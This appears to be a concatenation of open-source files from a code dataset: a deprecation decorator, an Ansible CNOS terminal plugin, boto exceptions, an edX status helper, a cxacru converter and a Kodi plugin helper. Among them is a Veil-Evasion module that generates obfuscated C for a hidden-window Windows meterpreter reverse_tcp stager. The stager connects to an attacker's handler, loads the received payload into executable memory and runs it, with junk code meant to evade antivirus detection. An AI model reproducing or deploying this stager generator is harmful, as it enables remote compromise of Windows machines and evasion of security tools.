            message = "Call to deprecated function {0}.".format(
                deprecated_fn.__name__)
            if self.will_be_removed_in is not None:
                message += " Will be removed in version {0}.".format(
                    self.will_be_removed_in)
            if self.alternative is not None:
                message += " Use {0} instead.".format(self.alternative)
            # stacklevel=2 attributes the warning to the caller of the
            # deprecated function, not to this wrapper.
            # NOTE(review): no explicit category is passed, so this emits the
            # default UserWarning rather than DeprecationWarning — confirm
            # this is intentional before changing it (filters differ).
            warnings.warn(message, stacklevel=2)
            return deprecated_fn(*args, **kwargs)
        # Append a Sphinx ".. deprecated::" directive to the wrapper's
        # docstring so the deprecation shows up in generated documentation.
        docs = "\n\n .. deprecated:: {0}\n".format(self.since_version)
        if self.will_be_removed_in is not None:
            docs += "\n Will be removed in version {0}.".format(
                self.will_be_removed_in)
        if self.alternative is not None:
            docs += "\n Use `{0}` instead.".format(self.alternative)
        if decorated.__doc__ is None:
            decorated.__doc__ = ''
        decorated.__doc__ += docs
        return decorated


def url_escape_path(path):
    """Escape a string value for a URL request path.

    Args:
        str: The path to escape

    Returns:
        str: The escaped path

    >>> url_escape_path("Foo, bar & baz / the hackers")
    u'Foo%2C%20bar%20%26%20baz%20%2F%20the%20hackers'
    """
    # Using 'safe' arg does not seem to work for python 2.6
    return quote_url(path.encode('utf-8')).replace('/', '%2F')
mit
gaddman/ansible
lib/ansible/plugins/terminal/cnos.py
86
2824
# (C) 2017 Red Hat Inc.
# Copyright (C) 2017 Lenovo.
#
# GNU General Public License v3.0+
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#
# Contains terminal Plugin methods for CNOS Config Module
# Lenovo Networking
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type

import json
import re

from ansible.errors import AnsibleConnectionFailure
from ansible.module_utils._text import to_text, to_bytes
from ansible.plugins.terminal import TerminalBase


class TerminalModule(TerminalBase):
    """Terminal plugin for Lenovo CNOS devices.

    Supplies the prompt/error regexes the connection layer uses to detect
    end-of-output and command failures, and hooks for shell setup and
    privilege escalation (enable mode).
    """

    # Byte patterns that match the device CLI prompt, used by the connection
    # plugin to decide when a command has finished producing output.
    terminal_stdout_re = [
        re.compile(br"[\r\n]?[\w+\-\.:\/\[\]]+(?:\([^\)]+\)){,3}(?:>|#) ?$"),
        re.compile(br"\[\w+\@[\w\-\.]+(?: [^\]])\] ?[>#\$] ?$"),
        re.compile(br">[\r\n]?")
    ]

    # Byte patterns that, if seen in command output, mark the command as
    # having failed on the device.
    terminal_stderr_re = [
        re.compile(br"% ?Error"),
        re.compile(br"% ?Bad secret"),
        re.compile(br"invalid input", re.I),
        re.compile(br"(?:incomplete|ambiguous) command", re.I),
        re.compile(br"connection timed out", re.I),
        re.compile(br"[^\r\n]+ not found"),
        re.compile(br"'[^']' +returned error code: ?\d+"),
    ]

    def on_open_shell(self):
        """Initialise the CLI session once the shell is open.

        Sends a bare newline to settle the prompt, then disables output
        paging so multi-page command output is not interrupted by
        --More-- prompts.
        """
        try:
            for cmd in (b'\n', b'terminal length 0\n'):
                self._exec_cli_command(cmd)
        except AnsibleConnectionFailure:
            raise AnsibleConnectionFailure('unable to set terminal parameters')

    def on_become(self, passwd=None):
        """Elevate the session to privileged (enable) mode.

        No-op if the prompt already ends with ``#`` (already privileged).
        Otherwise issues ``enable``, supplying ``passwd`` at the password
        prompt when one is given.
        """
        if self._get_prompt().endswith(b'#'):
            return
        cmd = {u'command': u'enable'}
        if passwd:
            # Note: python-3.5 cannot combine u"" and r"" together. Thus make
            # an r string and use to_text to ensure it's text
            # on both py2 and py3.
            cmd[u'prompt'] = to_text(r"[\r\n]?password: $",
                                     errors='surrogate_or_strict')
            cmd[u'answer'] = passwd
        try:
            # The command dict is serialised to JSON; the connection layer
            # interprets the prompt/answer keys for the interactive exchange.
            self._exec_cli_command(to_bytes(json.dumps(cmd),
                                            errors='surrogate_or_strict'))
        except AnsibleConnectionFailure:
            msg = 'unable to elevate privilege to enable mode'
            raise AnsibleConnectionFailure(msg)

    def on_unbecome(self):
        """Drop privileged mode, leaving config mode first if necessary."""
        prompt = self._get_prompt()
        if prompt is None:
            # if prompt is None most likely the terminal is hung up at a prompt
            return

        if b'(config' in prompt:
            # In configuration mode: exit it before dropping privilege.
            self._exec_cli_command(b'end')
            self._exec_cli_command(b'disable')
        elif prompt.endswith(b'#'):
            self._exec_cli_command(b'disable')
gpl-3.0
boomsbloom/dtm-fmri
DTM/for_gensim/lib/python2.7/site-packages/boto/directconnect/exceptions.py
148
1239
# Copyright (c) 2013 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#


class DirectConnectClientException(Exception):
    """Raised when the AWS Direct Connect service reports a client-side
    error, i.e. the request sent by the caller was rejected as invalid.
    """


class DirectConnectServerException(Exception):
    """Raised when the AWS Direct Connect service reports a server-side
    error while processing an otherwise valid request.
    """
mit
g0tmi1k/veil-Evasion
modules/payloads/c/meterpreter/rev_tcp.py
12
10638
""" Obfuscated, pure C windows/meterpreter/reverse_tcp Implements various randomized string processing functions in an attempt to obfuscate the call tree. Inspiration from https://github.com/rsmudge/metasploit-loader Module built by @harmj0y """ import random from modules.common import helpers class Payload: def __init__(self): # required options self.description = "pure windows/meterpreter/reverse_tcp stager, no shellcode" self.language = "c" self.extension = "c" self.rating = "Excellent" # optional # options we require user ineraction for- format is {Option : [Value, Description]]} self.required_options = { "LHOST" : ["", "IP of the Metasploit handler"], "LPORT" : ["4444", "Port of the Metasploit handler"], "COMPILE_TO_EXE" : ["Y", "Compile to an executable"] } def generate(self): winsock_init_name = helpers.randomString() punt_name = helpers.randomString() recv_all_name = helpers.randomString() wsconnect_name = helpers.randomString() # the real includes needed includes = [ "#include <stdio.h>" , "#include <stdlib.h>", "#include <windows.h>", "#include <string.h>"] # max length string for obfuscation global_max_string_length = 10000 max_string_length = random.randint(100,global_max_string_length) max_num_strings = 10000 # TODO: add in more string processing functions randName1 = helpers.randomString() # reverse() randName2 = helpers.randomString() # doubles characters stringModFunctions = [ (randName1, "char* %s(const char *t) { int length= strlen(t); int i; char* t2 = (char*)malloc((length+1) * sizeof(char)); for(i=0;i<length;i++) { t2[(length-1)-i]=t[i]; } t2[length] = '\\0'; return t2; }" %(randName1)), (randName2, "char* %s(char* s){ char *result = malloc(strlen(s)*2+1); int i; for (i=0; i<strlen(s)*2+1; i++){ result[i] = s[i/2]; result[i+1]=s[i/2];} result[i] = '\\0'; return result; }" %(randName2)) ] helpers.shuffle(stringModFunctions) # obfuscation "logical nop" string generation functions randString1 = helpers.randomString(50) randName1 = 
helpers.randomString() randVar1 = helpers.randomString() randName2 = helpers.randomString() randVar2 = helpers.randomString() randVar3 = helpers.randomString() randName3 = helpers.randomString() randVar4 = helpers.randomString() randVar5 = helpers.randomString() stringGenFunctions = [ (randName1, "char* %s(){ char *%s = %s(\"%s\"); return strstr( %s, \"%s\" );}" %(randName1, randVar1, stringModFunctions[0][0], randString1, randVar1, randString1[len(randString1)/2])), (randName2, "char* %s(){ char %s[%s], %s[%s/2]; strcpy(%s,\"%s\"); strcpy(%s,\"%s\"); return %s(strcat( %s, %s)); }" % (randName2, randVar2, max_string_length, randVar3, max_string_length, randVar2, helpers.randomString(50), randVar3, helpers.randomString(50), stringModFunctions[1][0], randVar2, randVar3)), (randName3, "char* %s() { char %s[%s] = \"%s\"; char *%s = strupr(%s); return strlwr(%s); }" % (randName3, randVar4, max_string_length, helpers.randomString(50), randVar5, randVar4, randVar5)) ] helpers.shuffle(stringGenFunctions) # obfuscation - add in our fake includes fake_includes = ["#include <sys/timeb.h>", "#include <time.h>", "#include <math.h>", "#include <signal.h>", "#include <stdarg.h>", "#include <limits.h>", "#include <assert.h>"] t = random.randint(1,7) for x in xrange(1, random.randint(1,7)): includes.append(fake_includes[x]) # shuffle up real/fake includes helpers.shuffle(includes) code = "#define _WIN32_WINNT 0x0500\n" code += "#include <winsock2.h>\n" code += "\n".join(includes) + "\n" #string mod functions code += stringModFunctions[0][1] + "\n" code += stringModFunctions[1][1] + "\n" # build the winsock_init function wVersionRequested_name = helpers.randomString() wsaData_name = helpers.randomString() code += "void %s() {" % (winsock_init_name) code += "WORD %s = MAKEWORD(%s, %s); WSADATA %s;" % (wVersionRequested_name, helpers.obfuscateNum(2,4), helpers.obfuscateNum(2,4), wsaData_name) code += "if (WSAStartup(%s, &%s) < 0) { WSACleanup(); exit(1);}}\n" 
%(wVersionRequested_name,wsaData_name) # first logical nop string function code += stringGenFunctions[0][1] + "\n" # build punt function my_socket_name = helpers.randomString() code += "void %s(SOCKET %s) {" %(punt_name, my_socket_name) code += "closesocket(%s);" %(my_socket_name) code += "WSACleanup();" code += "exit(1);}\n" # second logical nop string function code += stringGenFunctions[1][1] + "\n" # build recv_all function my_socket_name = helpers.randomString() buffer_name = helpers.randomString() len_name = helpers.randomString() code += "int %s(SOCKET %s, void * %s, int %s){" %(recv_all_name, my_socket_name, buffer_name, len_name) code += "int slfkmklsDSA=0;int rcAmwSVM=0;" code += "void * startb = %s;" %(buffer_name) code += "while (rcAmwSVM < %s) {" %(len_name) code += "slfkmklsDSA = recv(%s, (char *)startb, %s - rcAmwSVM, 0);" %(my_socket_name, len_name) code += "startb += slfkmklsDSA; rcAmwSVM += slfkmklsDSA;" code += "if (slfkmklsDSA == SOCKET_ERROR) %s(%s);} return rcAmwSVM; }\n" %(punt_name, my_socket_name) # third logical nop string function code += stringGenFunctions[2][1] + "\n" # build wsconnect function target_name = helpers.randomString() sock_name = helpers.randomString() my_socket_name = helpers.randomString() code += "SOCKET %s() { struct hostent * %s; struct sockaddr_in %s; SOCKET %s;" % (wsconnect_name, target_name, sock_name, my_socket_name) code += "%s = socket(AF_INET, SOCK_STREAM, 0);" %(my_socket_name) code += "if (%s == INVALID_SOCKET) %s(%s);" %(my_socket_name, punt_name, my_socket_name); code += "%s = gethostbyname(\"%s\");" %(target_name, self.required_options["LHOST"][0]) code += "if (%s == NULL) %s(%s);" %(target_name, punt_name, my_socket_name) code += "memcpy(&%s.sin_addr.s_addr, %s->h_addr, %s->h_length);" %(sock_name, target_name, target_name) code += "%s.sin_family = AF_INET;" %(sock_name) code += "%s.sin_port = htons(%s);" %(sock_name, helpers.obfuscateNum(int(self.required_options["LPORT"][0]),32)) code += "if ( 
connect(%s, (struct sockaddr *)&%s, sizeof(%s)) ) %s(%s);" %(my_socket_name, sock_name, sock_name, punt_name, my_socket_name) code += "return %s;}\n" %(my_socket_name) # build main() code size_name = helpers.randomString() buffer_name = helpers.randomString() function_name = helpers.randomString() my_socket_name = helpers.randomString() count_name = helpers.randomString() # obfuscation stuff char_array_name_1 = helpers.randomString() number_of_strings_1 = random.randint(1,max_num_strings) char_array_name_2 = helpers.randomString() number_of_strings_2 = random.randint(1,max_num_strings) char_array_name_3 = helpers.randomString() number_of_strings_3 = random.randint(1,max_num_strings) code += "int main(int argc, char * argv[]) {" code += "ShowWindow( GetConsoleWindow(), SW_HIDE );" code += "ULONG32 %s;" %(size_name) code += "char * %s;" %(buffer_name) code += "int i;" code += "char* %s[%s];" % (char_array_name_1, number_of_strings_1) code += "void (*%s)();" %(function_name) # malloc our first string obfuscation array code += "for (i = 0; i < %s; ++i) %s[i] = malloc (%s);" %(number_of_strings_1, char_array_name_1, random.randint(max_string_length,global_max_string_length)) code += "%s();" %(winsock_init_name) code += "char* %s[%s];" % (char_array_name_2, number_of_strings_2) code += "SOCKET %s = %s();" %(my_socket_name,wsconnect_name) # malloc our second string obfuscation array code += "for (i = 0; i < %s; ++i) %s[i] = malloc (%s);" %(number_of_strings_2, char_array_name_2, random.randint(max_string_length,global_max_string_length)) code += "int %s = recv(%s, (char *)&%s, %s, 0);" % (count_name, my_socket_name, size_name, helpers.obfuscateNum(4,2)) code += "if (%s != %s || %s <= 0) %s(%s);" %(count_name, helpers.obfuscateNum(4,2), size_name, punt_name, my_socket_name) code += "%s = VirtualAlloc(0, %s + %s, MEM_COMMIT, PAGE_EXECUTE_READWRITE);" %(buffer_name, size_name, helpers.obfuscateNum(5,2)) code += "char* %s[%s];" % (char_array_name_3, number_of_strings_3) # 
first string obfuscation method code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_1, char_array_name_1, stringGenFunctions[0][0]) # real code code += "if (%s == NULL) %s(%s);" %(buffer_name, punt_name, my_socket_name) code += "%s[0] = 0xBF;" %(buffer_name) code += "memcpy(%s + 1, &%s, %s);" %(buffer_name, my_socket_name, helpers.obfuscateNum(4,2)) # malloc our third string obfuscation array code += "for (i = 0; i < %s; ++i) %s[i] = malloc (%s);" %(number_of_strings_3, char_array_name_3, random.randint(max_string_length,global_max_string_length)) # second string obfuscation method code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_2, char_array_name_2, stringGenFunctions[1][0]) # real code code += "%s = %s(%s, %s + %s, %s);" %(count_name, recv_all_name, my_socket_name, buffer_name, helpers.obfuscateNum(5,2), size_name) code += "%s = (void (*)())%s;" %(function_name, buffer_name) code += "%s();" %(function_name) # third string obfuscation method (never called) code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_3, char_array_name_3, stringGenFunctions[2][0]) code += "return 0;}\n" return code
gpl-3.0
cyanna/edx-platform
common/djangoapps/status/status.py
48
1463
""" A tiny app that checks for a status message. """ from django.conf import settings from django.core.cache import cache import json import logging import os log = logging.getLogger(__name__) def get_site_status_msg(course_id): """ Look for a file settings.STATUS_MESSAGE_PATH. If found, read it, parse as json, and do the following: * if there is a key 'global', include that in the result list. * if course is not None, and there is a key for course.id, add that to the result list. * return "<br/>".join(result) Otherwise, return None. If something goes wrong, returns None. ("is there a status msg?" logic is not allowed to break the entire site). """ try: # first check for msg in cache msg = cache.get('site_status_msg') if msg is not None: return msg if os.path.isfile(settings.STATUS_MESSAGE_PATH): with open(settings.STATUS_MESSAGE_PATH) as f: content = f.read() else: return None status_dict = json.loads(content) msg = status_dict.get('global', None) if course_id in status_dict: msg = msg + "<br>" if msg else '' msg += status_dict[course_id] # set msg to cache, with expiry 5 mins cache.set('site_status_msg', msg, 60 * 5) return msg except: log.exception("Error while getting a status message.") return None
agpl-3.0
djmatt604/android_kernel_T989D_JB
Documentation/networking/cxacru-cf.py
14668
1626
#!/usr/bin/env python
# Copyright 2009 Simon Arlott
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the License, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 59
# Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# Usage: cxacru-cf.py < cxacru-cf.bin
# Output: values string suitable for the sysfs adsl_config attribute
#
# Warning: cxacru-cf.bin with MD5 hash cdbac2689969d5ed5d4850f117702110
# contains mis-aligned values which will stop the modem from being able
# to make a connection. If the first and last two bytes are removed then
# the values become valid, but the modulation will be forced to ANSI
# T1.413 only which may not be appropriate.
#
# The original binary format is a packed list of le32 values.

import io
import struct
import sys


def main(stream=None, out=None):
    """Convert a packed little-endian u32 dump into "index=value" pairs.

    Reads 4-byte little-endian unsigned integers from *stream* until EOF
    and writes a single space-separated line of "<hex index>=<value>"
    pairs to *out* -- the format expected by the cxacru sysfs
    adsl_config attribute.

    stream -- binary file object; defaults to stdin's byte stream.
              (On Python 3 the raw bytes live on sys.stdin.buffer;
              Python 2's stdin is already binary and has no .buffer.)
    out    -- text file object for the result; defaults to sys.stdout.

    Exits with status 1, after printing an error to stderr, if the input
    length is not a multiple of 4 bytes.
    """
    if stream is None:
        stream = getattr(sys.stdin, "buffer", sys.stdin)
    if out is None:
        out = sys.stdout

    i = 0
    while True:
        buf = stream.read(4)

        if len(buf) == 0:
            break
        elif len(buf) != 4:
            # Partial trailing value: terminate the output line, then fail.
            out.write("\n")
            sys.stderr.write("Error: read {0} not 4 bytes\n".format(len(buf)))
            sys.exit(1)

        if i > 0:
            out.write(" ")
        out.write("{0:x}={1}".format(i, struct.unpack("<I", buf)[0]))
        i += 1

    out.write("\n")


if __name__ == "__main__":
    main()
gpl-2.0
Ditmar/plugin.video.pelisalacarta
platformcode/xbmc/xbmctools.py
7
47971
# -*- coding: utf-8 -*- #------------------------------------------------------------ # pelisalacarta - XBMC Plugin # XBMC Tools # http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/ #------------------------------------------------------------ import urllib, urllib2 import xbmc import xbmcgui import xbmcplugin import sys import os from servers import servertools from core import config from core import logger # Esto permite su ejecución en modo emulado try: pluginhandle = int( sys.argv[ 1 ] ) except: pluginhandle = "" DEBUG = True # TODO: (3.2) Esto es un lío, hay que unificar def addnewfolder( canal , accion , category , title , url , thumbnail , plot , Serie="",totalItems=0,fanart="",context="", show="",fulltitle=""): if fulltitle=="": fulltitle=title ok = addnewfolderextra( canal , accion , category , title , url , thumbnail , plot , "" ,Serie,totalItems,fanart,context,show, fulltitle) return ok def addnewfolderextra( canal , accion , category , title , url , thumbnail , plot , extradata ,Serie="",totalItems=0,fanart="",context="",show="",fulltitle=""): if fulltitle=="": fulltitle=title contextCommands = [] ok = False try: context = urllib.unquote_plus(context) except: context="" if "|" in context: context = context.split("|") if DEBUG: try: logger.info('[xbmctools.py] addnewfolderextra( "'+extradata+'","'+canal+'" , "'+accion+'" , "'+category+'" , "'+title+'" , "' + url + '" , "'+thumbnail+'" , "'+plot+'")" , "'+Serie+'")"') except: logger.info('[xbmctools.py] addnewfolder(<unicode>)') listitem = xbmcgui.ListItem( title, iconImage="DefaultFolder.png", thumbnailImage=thumbnail ) listitem.setInfo( "video", { "Title" : title, "Plot" : plot, "Studio" : canal } ) if fanart!="": listitem.setProperty('fanart_image',fanart) xbmcplugin.setPluginFanart(pluginhandle, fanart) #Realzamos un quote sencillo para evitar problemas con títulos unicode # title = title.replace("&","%26").replace("+","%2B").replace("%","%25") try: title = title.encode ("utf-8") #This only 
aplies to unicode strings. The rest stay as they are. except: pass itemurl = '%s?fanart=%s&channel=%s&action=%s&category=%s&title=%s&fulltitle=%s&url=%s&thumbnail=%s&plot=%s&extradata=%s&Serie=%s&show=%s' % ( sys.argv[ 0 ] , fanart, canal , accion , urllib.quote_plus( category ) , urllib.quote_plus(title) , urllib.quote_plus(fulltitle) , urllib.quote_plus( url ) , urllib.quote_plus( thumbnail ) , urllib.quote_plus( plot ) , urllib.quote_plus( extradata ) , Serie, urllib.quote_plus( show )) if Serie != "": #Añadimos opción contextual para Añadir la serie completa a la biblioteca addSerieCommand = "XBMC.RunPlugin(%s?channel=%s&action=addlist2Library&category=%s&title=%s&fulltitle=%s&url=%s&extradata=%s&Serie=%s&show=%s)" % ( sys.argv[ 0 ] , canal , urllib.quote_plus( category ) , urllib.quote_plus( title ) , urllib.quote_plus(fulltitle) , urllib.quote_plus( url ) , urllib.quote_plus( extradata ) , Serie, urllib.quote_plus( show ) ) contextCommands.append(("Añadir Serie a Biblioteca",addSerieCommand)) if "1" in context and accion != "por_teclado": DeleteCommand = "XBMC.RunPlugin(%s?channel=buscador&action=borrar_busqueda&title=%s&url=%s&show=%s)" % ( sys.argv[ 0 ] , urllib.quote_plus( title ) , urllib.quote_plus( url ) , urllib.quote_plus( show ) ) contextCommands.append((config.get_localized_string( 30300 ),DeleteCommand)) if "4" in context: searchSubtitleCommand = "XBMC.RunPlugin(%s?channel=subtitletools&action=searchSubtitle&title=%s&url=%s&category=%s&fulltitle=%s&url=%s&thumbnail=%s&plot=%s&extradata=%s&Serie=%s&show=%s)" % ( sys.argv[ 0 ] , urllib.quote_plus( title ) , urllib.quote_plus( url ), urllib.quote_plus( category ), urllib.quote_plus(fulltitle) , urllib.quote_plus( url ) , urllib.quote_plus( thumbnail ) , urllib.quote_plus( plot ) , urllib.quote_plus( extradata ) , Serie, urllib.quote_plus( show ) ) contextCommands.append(("XBMC Subtitle",searchSubtitleCommand)) if "5" in context: trailerCommand = 
"XBMC.Container.Update(%s?channel=%s&action=%s&category=%s&title=%s&url=%s&thumbnail=%s&plot=%s)" % ( sys.argv[ 0 ] , "trailertools" , "buscartrailer" , urllib.quote_plus( category ) , urllib.quote_plus( title ) , urllib.quote_plus( url ) , urllib.quote_plus( thumbnail ) , urllib.quote_plus( "" ) ) contextCommands.append((config.get_localized_string(30162),trailerCommand)) if "6" in context: justinCommand = "XBMC.PlayMedia(%s?channel=%s&action=%s&category=%s&title=%s&url=%s&thumbnail=%s&plot=%s)" % ( sys.argv[ 0 ] , "justintv" , "playVideo" , urllib.quote_plus( category ) , urllib.quote_plus( title ) , urllib.quote_plus( url ) , urllib.quote_plus( thumbnail ) , urllib.quote_plus( "" ) ) contextCommands.append((config.get_localized_string(30410),justinCommand)) if "8" in context:# Añadir canal a favoritos justintv justinCommand = "XBMC.RunPlugin(%s?channel=%s&action=%s&category=%s&title=%s&url=%s&thumbnail=%s&plot=%s)" % ( sys.argv[ 0 ] , "justintv" , "addToFavorites" , urllib.quote_plus( category ) , urllib.quote_plus( title ) , urllib.quote_plus( url ) , urllib.quote_plus( thumbnail ) , urllib.quote_plus( "" ) ) contextCommands.append((config.get_localized_string(30406),justinCommand)) if "9" in context:# Remover canal de favoritos justintv justinCommand = "XBMC.Container.Update(%s?channel=%s&action=%s&category=%s&title=%s&url=%s&thumbnail=%s&plot=%s)" % ( sys.argv[ 0 ] , "justintv" , "removeFromFavorites" , urllib.quote_plus( category ) , urllib.quote_plus( title ) , urllib.quote_plus( url ) , urllib.quote_plus( thumbnail ) , urllib.quote_plus( "" ) ) contextCommands.append((config.get_localized_string(30407),justinCommand)) if config.get_platform()=="boxee": #logger.info("Modo boxee") ok = xbmcplugin.addDirectoryItem( handle = pluginhandle, url = itemurl , listitem=listitem, isFolder=True) else: #logger.info("Modo xbmc") if len(contextCommands) > 0: listitem.addContextMenuItems ( contextCommands, replaceItems=False) if totalItems == 0: ok = 
xbmcplugin.addDirectoryItem( handle = pluginhandle, url = itemurl , listitem=listitem, isFolder=True) else: ok = xbmcplugin.addDirectoryItem( handle = pluginhandle, url = itemurl , listitem=listitem, isFolder=True, totalItems=totalItems) return ok def addnewvideo( canal , accion , category , server , title , url , thumbnail, plot ,Serie="",duration="",fanart="",IsPlayable='false',context = "", subtitle="", viewmode="", totalItems = 0, show="", password="", extra="",fulltitle=""): contextCommands = [] ok = False try: context = urllib.unquote_plus(context) except: context="" if "|" in context: context = context.split("|") if DEBUG: try: logger.info('[xbmctools.py] addnewvideo( "'+canal+'" , "'+accion+'" , "'+category+'" , "'+server+'" , "'+title+'" ("'+fulltitle+'") , "' + url + '" , "'+thumbnail+'" , "'+plot+'")" , "'+Serie+'")"') except: logger.info('[xbmctools.py] addnewvideo(<unicode>)') icon_image = os.path.join( config.get_runtime_path() , "resources" , "images" , "servers" , server+".png" ) if not os.path.exists(icon_image): icon_image = "DefaultVideo.png" listitem = xbmcgui.ListItem( title, iconImage="DefaultVideo.png", thumbnailImage=thumbnail ) listitem.setInfo( "video", { "Title" : title, "FileName" : title, "Plot" : plot, "Duration" : duration, "Studio" : canal, "Genre" : category } ) if fanart!="": #logger.info("fanart :%s" %fanart) listitem.setProperty('fanart_image',fanart) xbmcplugin.setPluginFanart(pluginhandle, fanart) if IsPlayable == 'true': #Esta opcion es para poder utilizar el xbmcplugin.setResolvedUrl() listitem.setProperty('IsPlayable', 'true') #listitem.setProperty('fanart_image',os.path.join(IMAGES_PATH, "cinetube.png")) if "1" in context: #El uno añade al menu contextual la opcion de guardar en megalive un canal a favoritos addItemCommand = "XBMC.RunPlugin(%s?channel=%s&action=%s&category=%s&title=%s&fulltitle=%s&url=%s&thumbnail=%s&plot=%s&server=%s&Serie=%s&show=%s&password=%s&extradata=%s)" % ( sys.argv[ 0 ] , canal , 
"saveChannelFavorites" , urllib.quote_plus( category ) , urllib.quote_plus( title ) , urllib.quote_plus( fulltitle ) , urllib.quote_plus( url ) , urllib.quote_plus( thumbnail ) , urllib.quote_plus( plot ) , server , Serie, urllib.quote_plus(show), urllib.quote_plus( password) , urllib.quote_plus(extra) ) contextCommands.append((config.get_localized_string(30301),addItemCommand)) if "2" in context:#El dos añade al menu contextual la opciones de eliminar y/o renombrar un canal en favoritos addItemCommand = "XBMC.RunPlugin(%s?channel=%s&action=%s&category=%s&title=%s&url=%s&thumbnail=%s&plot=%s&server=%s&Serie=%s&show=%s&password=%s&extradata=%s)" % ( sys.argv[ 0 ] , canal , "deleteSavedChannel" , urllib.quote_plus( category ) , urllib.quote_plus( title ) , urllib.quote_plus( fulltitle ) , urllib.quote_plus( url ) , urllib.quote_plus( thumbnail ) , urllib.quote_plus( plot ) , server , Serie, urllib.quote_plus( show), urllib.quote_plus( password) , urllib.quote_plus(extra) ) contextCommands.append((config.get_localized_string(30302),addItemCommand)) addItemCommand = "XBMC.RunPlugin(%s?channel=%s&action=%s&category=%s&title=%s&url=%s&thumbnail=%s&plot=%s&server=%s&Serie=%s&show=%s&password=%s&extradata=%s)" % ( sys.argv[ 0 ] , canal , "renameChannelTitle" , urllib.quote_plus( category ) , urllib.quote_plus( title ) , urllib.quote_plus( fulltitle ) , urllib.quote_plus( url ) , urllib.quote_plus( thumbnail ) , urllib.quote_plus( plot ) , server , Serie, urllib.quote_plus( show),urllib.quote_plus( password) , urllib.quote_plus(extra) ) contextCommands.append((config.get_localized_string(30303),addItemCommand)) if "6" in context:# Ver canal en vivo en justintv justinCommand = "XBMC.PlayMedia(%s?channel=%s&action=%s&category=%s&title=%s&url=%s&thumbnail=%s&plot=%s)" % ( sys.argv[ 0 ] , "justintv" , "playVideo" , urllib.quote_plus( category ) , urllib.quote_plus( title ) , urllib.quote_plus( url ) , urllib.quote_plus( thumbnail ) , urllib.quote_plus( plot ) ) 
contextCommands.append((config.get_localized_string(30410),justinCommand)) if "7" in context:# Listar videos archivados en justintv justinCommand = "XBMC.Container.Update(%s?channel=%s&action=%s&category=%s&title=%s&url=%s&thumbnail=%s&plot=%s)" % ( sys.argv[ 0 ] , "justintv" , "listarchives" , urllib.quote_plus( category ) , urllib.quote_plus( title ) , urllib.quote_plus( url ) , urllib.quote_plus( thumbnail ) , urllib.quote_plus( "" ) ) contextCommands.append((config.get_localized_string(30409),justinCommand)) if "8" in context:# Añadir canal a favoritos justintv justinCommand = "XBMC.RunPlugin(%s?channel=%s&action=%s&category=%s&title=%s&url=%s&thumbnail=%s&plot=%s)" % ( sys.argv[ 0 ] , "justintv" , "addToFavorites" , urllib.quote_plus( category ) , urllib.quote_plus( title ) , urllib.quote_plus( url ) , urllib.quote_plus( thumbnail ) , urllib.quote_plus( "" ) ) contextCommands.append((config.get_localized_string(30406),justinCommand)) if "9" in context:# Remover canal de favoritos justintv justinCommand = "XBMC.Container.Update(%s?channel=%s&action=%s&category=%s&title=%s&url=%s&thumbnail=%s&plot=%s)" % ( sys.argv[ 0 ] , "justintv" , "removeFromFavorites" , urllib.quote_plus( category ) , urllib.quote_plus( title ) , urllib.quote_plus( url ) , urllib.quote_plus( thumbnail ) , urllib.quote_plus( "" ) ) contextCommands.append((config.get_localized_string(30407),justinCommand)) if len (contextCommands) > 0: listitem.addContextMenuItems ( contextCommands, replaceItems=False) try: title = title.encode ("utf-8") #This only aplies to unicode strings. The rest stay as they are. 
plot = plot.encode ("utf-8") except: pass itemurl = '%s?fanart=%s&channel=%s&action=%s&category=%s&title=%s&fulltitle=%s&url=%s&thumbnail=%s&plot=%s&server=%s&Serie=%s&subtitle=%s&viewmode=%s&show=%s&extradata=%s' % ( sys.argv[ 0 ] , fanart, canal , accion , urllib.quote_plus( category ) , urllib.quote_plus( title ) , urllib.quote_plus( fulltitle ) , urllib.quote_plus( url ) , urllib.quote_plus( thumbnail ) , urllib.quote_plus( plot ) , server , Serie , urllib.quote_plus(subtitle), urllib.quote_plus(viewmode), urllib.quote_plus( show ) , urllib.quote_plus(extra) ) #logger.info("[xbmctools.py] itemurl=%s" % itemurl) if totalItems == 0: ok = xbmcplugin.addDirectoryItem( handle = pluginhandle, url=itemurl, listitem=listitem, isFolder=False) else: ok = xbmcplugin.addDirectoryItem( handle = pluginhandle, url=itemurl, listitem=listitem, isFolder=False, totalItems=totalItems) return ok def addthumbnailfolder( canal , scrapedtitle , scrapedurl , scrapedthumbnail , accion ): logger.info('[xbmctools.py] addthumbnailfolder( "'+scrapedtitle+'" , "' + scrapedurl + '" , "'+scrapedthumbnail+'" , "'+accion+'")"') 